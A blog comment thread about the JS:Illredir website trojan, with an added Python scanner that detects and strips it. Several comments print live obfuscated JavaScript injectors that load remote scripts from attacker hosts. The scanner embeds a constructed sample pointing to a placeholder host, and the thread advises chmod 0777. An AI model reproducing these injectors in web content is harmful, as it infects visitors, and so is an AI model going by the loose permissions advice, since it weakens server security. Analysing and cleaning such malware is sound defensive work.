    @Hanok - this is because you have a Joomla installation. Try to rename your .htaccess file. Then run the script and then restore the .htaccess file. If you don't have an .htaccess file then you have to temporarily comment out the place where you're doing URL rewrites. As far as permissions go, you have to have write permissions to all infected files (for the apache user or other http user configured by your hosting company); it usually means 0777. The script will try to restore it back to 0444, but unless your files are owned by the apache user it won't be possible. First run the script; it will tell you which files are infected. Then chmod them 0777 and run the script again. If the files are owned by the apache user (or other http server user) the script will fix them and restore chmod 0444. Otherwise you will have to restore chmod 0444 on those files yourself.

  • Josh

    Think there might be a new mutation of this. A client site of mine got hit with the following on 2/9/2010. var gb='';var gg='';this.lf="";var _=window;var _j;if(_j!=''){_j='k'};this._x=false;var t=document;var i='sEc7rEiEp:tE'.replace(/[E7v:&]/g, '');var ir;if(ir!='' && ir!='y'){ir=''};var td;if(td!='' && td!='c'){td=''};var x;if(x!='yz' && x != ''){x=null};_.onload=function(){var _ba;if(_ba!='ji' && _ba != ''){_ba=null};try {o=t.createElement(i);var vv=false;o.src='h&t%t%p&:?/Y/Yt&u&b3e%8Y-Yc3o%mY.3s?k%y3s3p&o?r&t%s?.3c3o3m&.&hYu?r3r?iYy&eYt?-%c&o3m%-&tYr?.?b3e3s?tYn%eYw3h?aYv3e3n&.3r&u%:?830?8&0?/%pYc?a&uYt3o?.3c%o3m%.3cYn?/%p3c3a?u3t&o3.%c&o3m?.?c?n?/%l?oYv?e32&1Yc?n3.?c&o3m?/3g3oYo?g?l3eY.&c&o?m%.3s?g3/3gYo&o3g%l&e%.&c&o?m3/%'.replace(/[%3?&Y]/g, '');var yj;if(yj!=''){yj='ea'};var kd='';o.setAttribute('dpe5fpe_rC'.replace(/[C_p56]/g, ''), "1");this.zo="zo";this.oe=40788;var vr;if(vr!='' && vr!='ifs'){vr=null};t.body.appendChild(o);} catch(oz){var n='';};};

  • Sandun

    Hi, I just found that my site is infected by JS:Illredir-K [Trj]. It is detected by Avast 5. Does anyone have a modified tool to remove this virus? Because ver. 0.99 is not useful any more. Thanks

  • Georgi

    Hello, this virus infected my website again, and now it is version Q.

  • Jaakko

    And we have IllRedir on forums... cannot get rid of it. First we had Illredir-S and after several cleanups it mutated to version W. It puts in each index.php and .js file a script... after cleanup it returns with different variables... all in 1 line (similar to Josh's comment): var s;if(s!='Ya' && s!='q'){s='Ya'}; ... var B=i('/7s7uXi7tSe31S071S.Xc3oSmX/SsXuXi3t7eS13031X.7cXo3mS/3o3rSbXi7tSd3o3wSn3lXoXa3d7eXr3.3c7oSmX/SgXo7o3g3lSeS.7cXoSmX/SvSeSoSh7.7c3oSmS.Sp3h7pS',"7XS3");var J=i('hKtZtZpZ:Z/K/ZmKlKbZ-KcZoKmZ.ZnZeZtZlKoZgK.KcZoKmZ.KdZeKtZiZkZnZeZwKsK-KcKoZmK.KjZeZrKsZeKyKhZoZmZeKsZiZtZeK.KrZuZ:Z',"KZ"); ... {Ig=null}; There's a secret URL and path in those variables... the browser tries to connect to the site, whatever it is doing :S

  • Gumba

    Looks like I'm on version S, what the heck do I do to remove this?

  • Andrew

    Hi Mike, when trying to start the script with 755 I got this error: Running... PHP version: 4.4.9 Starting ... Files processed: 6405 Files fixed: 0 When using 777 I'm getting Internal Server Error 404. I'm using Joomla; the htaccess files were renamed. Can you recommend something? Kind regards, Andrew

  • Mike

    Version 1.0 is out. It should fix most of the latest versions; however, if you're doing something similar to the virus code, your code may be removed too. The script is creating backup copies, so if something doesn't work after you run the script, keep the script output log and restore from the backups. @Andrew Try to use the latest version; also don't chmod 777 the script itself, just the other files. Some PHP servers won't run the script with write/execute permissions.

  • LuisTim

    Hi guys, I had this virus in my site and with Mike's script I cleaned it and it worked fine until now. Now I think that I have a new virus, because Mike's script isn't cleaning my website... it cleaned some files but the website continues with the virus :( Can someone tell me if it is the same virus? My site is: http://www.filmes-terror.com I am using ESET NOD32 and it shows me that the virus name is: JS/TrojanDownloader.Agent.NSM trojan I installed AVAST on another PC and it shows me that the virus name is: [L] JS:Illredir-W [Trj]

  • Hatem

    Hi everyone, the same as LuisTim said, I had the same virus in my site, and it had changed many things in my pages. First of all I noticed that the buttons of the text editor of my forum (I use vBulletin) got frozen... they give no action after clicking them. I thought my browser hung or something, then I opened my site from another PC and it is the same, and when I opened my forum control panel I found it not working properly; I mean when I click "submit" for something, it doesn't submit. The same problem as the text editor happened to 2 other applications I use. After getting a backup of my website on my PC, the NOD32 antivirus notified me that many files (most of them are index files, as Mike said) are infected with ((js/trojandownloader.agent.nsm trojan)), and gave me 2 options: 1- Delete, 2- Rename (just renaming it from index.html to index.vhtml). These infected files were modified on March 1, 2010. Can anyone help??? P.S. I've been running the script for more than 30 minutes now and it just says: Running... PHP version: 4.4.9 Starting ... Is that normal?? Thank you in advance, best regards, Hatem

  • Barak

    My sites all started to fall to this shit virus... I cleaned the files out by hand first, but still in some days they all just come back from somewhere. Apart from Avast there is not any antivirus even recognizing something is not okay. My version has mutated to Z already... What should I try to get rid of it? Did anyone get really completely rid of it? How did you make that happen? Thanks for your attention, B.

  • florencia

    I'm from Argentina. I have my pages with this virus and really do not understand anything of what you are talking about. Can you help solve it? Examples: www.susanajust.com.ar www.puntopizza.com.ar

  • Steve

    Hi, I have the JS:Illredir-Y [Trj] trojan on a website running Joomla, detected by Avast. Any fix for that? Thanks a lot

  • Hatem

    (((((( HERE IS THE SOLUTION ))))))
    1- Download your entire site.
    2- Open an infected index file; you will find a strange code at the end of the page. COPY it and paste it in a text file.
    3- Using your HTML editor (I'm using DreamWeaver), use the "find and replace" option to search for the code in the entire site and replace it with a "space", for example; that's how you'll get rid of all the infected files in a few seconds.
    4- Delete all the files from your site (AFTER GETTING A BACKUP in case anything goes wrong).
    5- Upload your cleaned files.
    PLEASE NOTE:
    1- This damn virus may damage some files, so you may notice some functions are not working properly after cleaning up, because all we did is remove the code, but the virus didn't only put the code in, it also edited (damaged) some files. So if you notice that some functions are not working properly, you will have to compare your files with the original files. For example, in my forum (vBulletin) I had to replace the files in the "clientscript" folder with the original files that came with the forum when I bought it, because the text editor and some other functions in the admin control panel were not working.
    2- The virus may use 2 codes; I think there was a different code in the javascript files (.js), so after cleaning up, don't forget to open a javascript file (.js) to check if there is another code. If so, use the same steps to clean.
    3- After you finish, go to safeweb.norton.com and register to check your site. The site will tell you that your site is queued for checking, and it is going to be checked quickly (my site was checked after a few hours).
    THAT'S IT. And one thing I have learned from this virus: to get a backup of my site every day.
    Best Regards :) Hatem Tawfik BokraLena.com

  • LuisTim

    Hi Hatem, thank you for your solution... It is more work but I think that I will try. I only have one doubt... When I tried to download my site, my antivirus didn't let me... because it detects a virus in the files. My question is: is it safe to disable the antivirus to download the site? Won't I get infected by opening the files? Thank you

  • Barak

    Hi Hatem, thank you for your answer. Actually I was already trying this, but my problem was that all the .js files seemed to be infected, or at least that is what Avast tells me while downloading all the files. When I wanted to clean them, it did not clean them, only quarantined them. Do you know any solution for this? Thank you for your attention, B.

  • Hatem

    Hi LuisTim & Barak, here are the steps that I did to fix my site:
    1- Full antivirus scan of my computer.
    2- Uninstall the antivirus (after that, don't open your site via your browser, because the virus will be downloaded to your PC if you do so).
    3- Download your entire site using your FTP program (I'm using FileZilla, and I like it because it tells you if some files failed to download). REMEMBER not to open any page from your downloaded files via Internet Explorer or any other browser, because the virus will also be downloaded to your PC if you do so.
    4- Edit your files using your HTML editor as I explained in the last post.
    5- Before you upload your fixed files, re-install your antivirus to make sure that you cleaned every infected file.
    6- If everything is ok, delete the files from your host.
    7- Upload your fixed files.
    Don't forget to check all the functions in your site like scripts and text editors, to make sure that everything is ok and that the virus didn't damage any files, and if it did, you will have to replace the infected files with new ones, as I said in the last post; in my forum (vBulletin) I had to replace the files in the "clientscript" folder with the original files that came with the forum when I bought it, and I also replaced some other scripts' files outside the forum. I know it will take some time, but I spent more than 4 days searching the web for a solution and I didn't find any, so I got this idea and it works; it was just 1 hour of work except the time of download and upload. And sorry for being late to answer you, but I've just got back from work. Best Regards, BokraLena.com

  • Chuck

    Hey All - I too was infected with the JS:Illredir [Trj] trojan on two of my sites, detected using the Avast free antivirus program. My two sites are hosted at 1and1.com. I got the same pat answers to a solution, increase password strength; they took no responsibility at all. Anyway I found that the only true fix was to edit the infected files by hand by removing the ancillary code at the bottom of each infected page (like the code referenced in the above responses - yes it is easy, but if your site is large it could take a bit of time). If you use a site editing program like Dreamweaver you may be able to replace the code string with a space by doing a search and replace throughout the entire site; that should speed things up a bit. BE SURE TO CHECK ALL JAVASCRIPT JS FILES!!! Not just your php & html files. The code WILL BE THERE ALSO and if not deleted from those files will re-propagate through your site once again... once you have cleaned up all files, reset your passwords with case-sensitive alphanumeric characters. IF YOU USE ANY OPEN SOURCE PROGRAMS CHANGE ANY STANDARD PASSWORDS AND FOLDER NAME SETTINGS WHEREVER YOU CAN! Hope this helps. Good luck to you all. Blessings.

  • Arturo

    Just received a letter of deactivation from Bluehost. I called them and asked what the reason was. Sure enough, it was because of those stupid JS redirect trojans. I've been at it the whole day trying to clean my files manually. Is there something we can use to fix it?

  • fanta78

    Hi Zyen and everyone, I got almost the same issue on one of my WordPress blogs last weekend. A local anti-malware software (Trend Micro) found this: Virus JS:Illredir-AQ [Trj] (Engine B). Some major php files were infected, as well as most of the standard WordPress .js files, plus some plugin js files too. I got rid of this infection by reloading the original WordPress files over it, plus the infected plugins' original files. The database was unaffected. The malware was sending some requests to floridaorigin.at and consisted of a long javascript line added at the end of the infected files. It looked like this: var i='';var I="";var N_=new Date();var FH;if(FH!='uj' && FH!='Wf'){FH=''};.... I read in the comments that this malware could have used the FTP client on a PC to infect the WordPress install. Is this behavior confirmed? Thanks!

  • fanta78

    I forgot to mention that the malware added a new file in the /wp-admin/js folder, named users.js. I did not spot it in the first place because its name was similar to a standard WP file. But a comparison with a blank WP installation shows this extra file.

  • Miguel

    Now there is another "flavour" of this f*cking trojan. AVAST detects it as "JS:Illredir-BL". In my case (a few DRUPAL websites) the sites were not loading (a PHP error was spat out) and therefore I noticed the presence of these weird JS lines at the end of my files. It seems to use FTP client stored passwords (FileZilla's in my case) to connect to every site and modify files. It has been a pain in the ass to fix all the mess this shit has done. The malware code is something like: YS=["r","Ro"];this.c=11526;this.c-=10;l={d:"K"};var T={};var y=document;var b="b";var Yi="Yi";var R=new String("body6mNV".substr(0,4));var ln=new Array();var _e='';var z=null;var cU=["vA"];var s="sc"+"ri"+"pt";var q=window;this.P=43688;this.P++;var qG;var CB="";function i(){mT={M:"rx"};this.If='';var X=String("]");var H='';var Xb={A:13552};var hm={Dp:61130};var B=RegExp;var Sa=["S_","Mo"];this.zO=49795;this.zO+=11;var Z="x2fx62x72x61x6dx6ax6ex65x74x2dx63x6fx6dx2fx67x6fx6fx67x6cx65x2ex63x6fx6dx2fx6cx65x6fx2ex6fx72x67x2ex70x68x70";this.g=25187;this.g+=62;var Jv="Jv";var X=String("]");Ur=29560;Ur--;var Nu=new Array();Ql=60522;Ql--;this.WX=false;function _(L,h){var Yx=new Array();var o="[";Vn=6775;Vn++;o+=h;o+=X;lR=["e","vH"];var V=new B(o, new String("gKaW6".substr(0,1)));try {var V_='WH'} catch(V_){};return L[new String("rep"+"lacgj8".substr(0,3)+"e")](V, H);Mm=41961;Mm--;};try {var xu='vu'} catch(xu){};try {var tm='IH'} catch(tm){};var CN="CN";var w=940941-932861;var XG=String("http:"+"//nos"+"ypipe"+".ru:");this.qS='';var Bv=8354;z=String("onl"+"oad");cz=["Ni","fv","RD"];var VU='';var TG=["uh"];Fq={};var v=_('cGrQeUaOtBewEOlOeImPeSnwtw','PsSIOGDyQiUoFqTBwZX');var _n=_('aQp6pKe0nud0C8hui1l3du','38uqo0JwM1KQ6V');qG=function(){var cn=new String();try {try {} catch(ZZ){};F=y[v](s);DC={EY:18252};Ru={eo:49335};VU=XG;try {var UX='PS'} catch(UX){};ma={lC:11445};VU+=w;this.je=false;VU+=Z;IHU=[];try {var os='sN'} catch(os){};var D="src2md".substr(0,3);cUe={xf:"GK"};var m=_('d1e1fpeArZ','1Xi_pZA');this.p=46351;this.p+=155;F[D]=VU;var Bm={Vi:"WS"};F[m]=[1][0];kY={oI:false};var PI=new Array();this.VN="VN";gL=["hu","wM","za"];y[R][_n](F);var ek=new String();} catch(f){var iC={xI:2475};var BZ=new Array();this.qz=24565;this.qz-=141;};try {} catch(yW){};var Xw={kn:62411};};JA=62427;JA++;jI=13986;jI++;};var Sw='';var kA=["KP","xb","gF"];i();this.Ss=44880;this.Ss++;var Ek="";var Sv=["yb","FS"];q[z]=qG;WY=32921;WY-=67; Hope this helps someone.
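
A defender-side scanner for the pattern this thread describes: the one-line payload appended to index and .js files, whose strings are decoded by deleting junk characters (as in Josh's, Jaakko's and Miguel's samples), removed with a backup kept (as in Hatem's and Mike's procedures). This is an added example written for this page, not Mike's remove-js-illredir-b.php; the sample injected line and the host evil.example.invalid are constructed.

```python
"""Added example, not Mike's remove-js-illredir-b.php: find the appended one-line
JavaScript the thread describes, decode its '...'.replace(/[junk]/g,'') strings to
see where it points, then back up the file and strip the line. The sample line and
the host evil.example.invalid are constructed placeholders."""
import re
import shutil
import tempfile
from pathlib import Path

# Josh's, Jaakko's and Miguel's samples recover 'script' and the URL by deleting
# a character class from a padded string; do the same deletion in Python.
OBF_RE = re.compile(r"'([^']+)'\.replace\(/\[([^\]]+)\]/g,\s*''\)")
SCAN_SUFFIXES = {'.php', '.html', '.htm', '.js'}

# Constructed stand-in for an injected line (decodes to script / URL / defer).
SAMPLE_INJECTED = (
    "var _=window;var t=document;var i='sQcQrQiQpQtQ'.replace(/[Q9]/g, '');"
    "_.onload=function(){try{o=t.createElement(i);"
    "o.src='hQtQtQpQ:Q/Q/QeQvQiQlQ.QeQxQaQmQpQlQeQ.QiQnQvQaQlQiQdQ/Q'.replace(/[Q9]/g, '');"
    "o.setAttribute('dQeQfQeQrQ'.replace(/[Q9]/g, ''),\"1\");t.body.appendChild(o);}catch(e){}};"
)

def decode_obfuscated(line):
    """Plaintext of every '...'.replace(/[junk]/g, '') call on the line."""
    return [''.join(c for c in enc if c not in junk) for enc, junk in OBF_RE.findall(line)]

def looks_injected(line):
    """A line that decodes to a script tag or URL and hooks onload/createElement."""
    decoded = decode_obfuscated(line)
    marker = any(d == 'script' or d.startswith('http') for d in decoded)
    return marker and ('onload' in line or 'createElement' in line)

def scan_tree(root):
    """Map relative path -> [(line_no, decoded strings)] for each infected file."""
    root, findings = Path(root), {}
    for path in root.rglob('*'):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        lines = path.read_text(errors='replace').splitlines()
        hits = [(n, decode_obfuscated(l)) for n, l in enumerate(lines, 1) if looks_injected(l)]
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def clean_file(path):
    """Copy path to path.bak, drop injected lines, return the number removed. Whole
    lines go, so a payload glued onto a legitimate line takes it along: keep the backup."""
    path = Path(path)
    lines = path.read_text(errors='replace').splitlines(keepends=True)
    kept = [l for l in lines if not looks_injected(l)]
    removed = len(lines) - len(kept)
    if removed:
        shutil.copy2(path, path.with_name(path.name + '.bak'))
        path.write_text(''.join(kept))
    return removed

def run_demo():
    """Build a constructed site tree, scan it, clean index.php, rescan."""
    root = Path(tempfile.mkdtemp())
    (root / 'wp-includes' / 'js').mkdir(parents=True)
    (root / 'index.php').write_text("<?php echo 'hi'; ?>\n" + SAMPLE_INJECTED + "\n")
    (root / 'wp-includes' / 'js' / 'date.js').write_text("var x=1;\n" + SAMPLE_INJECTED + "\n")
    before = scan_tree(root)
    removed = clean_file(root / 'index.php')
    return before, removed, scan_tree(root)
```

Run scan_tree over a downloaded copy of the site first and read the decoded strings; only files whose decoded strings are clearly not yours should be passed to clean_file, since legitimate minified code that uses the same replace trick would be flagged as well.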

  • Yohanes Supriyato

    Nice... thanks for the information.

  • Marco

    I have a server where some sites were infected; how can I secure the server so this doesn't happen again?

  • Tess

    Hi, thank you all for the valuable information. I am not a techy person and I need help. My WP blog was just infected by a Trojan virus JS:Illredir-CB[Trj]. When I open my website, Avast gives a notice that looks like this: Object: my website folder\javascript\date.js Infection: JS:Illredir-CB[Trj] Action: Connection aborted Process: c:\Program Files\IE\iexplore.exe Can anybody help me remove this virus? I have informed my hosting about this but they said the infection must be in my local hard drive. Thanks in advance.

  • muwko

    It was very interesting to read. I want to quote your post in my blog. Is that ok? And do you have an account on Twitter?

  • Minnie Eichholz

    I posted concerning earlier.

  • Website

    In IE9, Microsoft has integrated its SmartScreen Filter with the new Download Manager feature to bolster security.

  • jayson

    Hi Mike, please help me. I don't know how I can fix this problem: whenever I access my WP blog - http://blog.gohunt.ph/wp-admin - it redirects to this URL - http://blog.gohunt.ph/wp-login.php?redirect_to=http://blog.gohunt.ph/wp-admin/&reauth=1 My client uses BLUEHOST and I don't know if our programmer knows of this issue in relation to their hosting provider.

  • Fred

    Thanks for this post.

  • Rod Griffis

    Thanks so much Mike. I just ran your script, and it worked perfectly. I have been trying to figure out what to do for a couple of weeks. You're a genius.
